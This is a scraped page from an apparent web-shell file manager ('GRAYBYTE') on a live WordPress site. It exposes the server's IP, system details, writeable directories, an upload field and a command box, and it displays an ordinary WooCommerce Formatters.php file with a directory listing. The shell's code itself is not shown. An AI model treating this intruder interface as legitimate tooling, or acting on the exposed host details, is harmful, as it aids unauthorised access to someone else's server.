GRAYBYTE WORDPRESS FILE MANAGER6167

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/chahida.co.in/wp-content/plugins/woocommerce/src/StoreApi/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/chahida.co.in/wp-content/plugins/woocommerce/src/StoreApi//Formatters.php
<?php
namespace Automattic\WooCommerce\StoreApi;

use \Exception;
use Automattic\WooCommerce\StoreApi\Formatters\DefaultFormatter;

/**
 * Formatters class.
 *
 * Allows formatter classes to be registered. Formatters are exposed to extensions via the ExtendSchema class.
 */
class Formatters {
	/**
	 * Holds an array of formatter class instances.
	 *
	 * @var array
	 */
	private $formatters = [];

	/**
	 * Get a new instance of a formatter class.
	 *
	 * @throws Exception An Exception is thrown if a non-existing formatter is used and the user is admin.
	 *
	 * @param string $name Name of the formatter.
	 * @return FormatterInterface Formatter class instance.
	 */
	public function __get( $name ) {
		if ( ! isset( $this->formatters[ $name ] ) ) {
			if ( defined( 'WP_DEBUG' ) && WP_DEBUG && current_user_can( 'manage_woocommerce' ) ) {
				throw new Exception( $name . ' formatter does not exist' );
			}
			return new DefaultFormatter();
		}
		return $this->formatters[ $name ];
	}

	/**
	 * Register a formatter class for usage.
	 *
	 * @param string $name Name of the formatter.
	 * @param string $class A formatter class name.
	 */
	public function register( $name, $class ) {
		$this->formatters[ $name ] = new $class();
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
Exceptions
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
Formatters
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
Payments
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
Routes
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
Schemas
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
Utilities
--
July 10 2025 04:32:19
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:19
giriqfky / giriqfky
0644
Authentication.php
11.952 KB
April 22 2025 15:40:34
giriqfky / giriqfky
0644
Formatters.php
1.21 KB
December 27 2023 00:45:02
giriqfky / giriqfky
0644
Legacy.php
3.087 KB
January 21 2025 18:53:44
giriqfky / giriqfky
0644
RoutesController.php
6.203 KB
May 12 2025 21:07:28
giriqfky / giriqfky
0644
SchemaController.php
3.237 KB
May 12 2025 21:07:28
giriqfky / giriqfky
0644
SessionHandler.php
2.655 KB
December 27 2023 00:45:02
giriqfky / giriqfky
0644
StoreApi.php
3.254 KB
April 22 2025 15:40:34
giriqfky / giriqfky
0644
deprecated.php
7.968 KB
December 27 2023 00:45:02
giriqfky / giriqfky
0644
functions.php
2.701 KB
December 27 2023 00:45:02
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF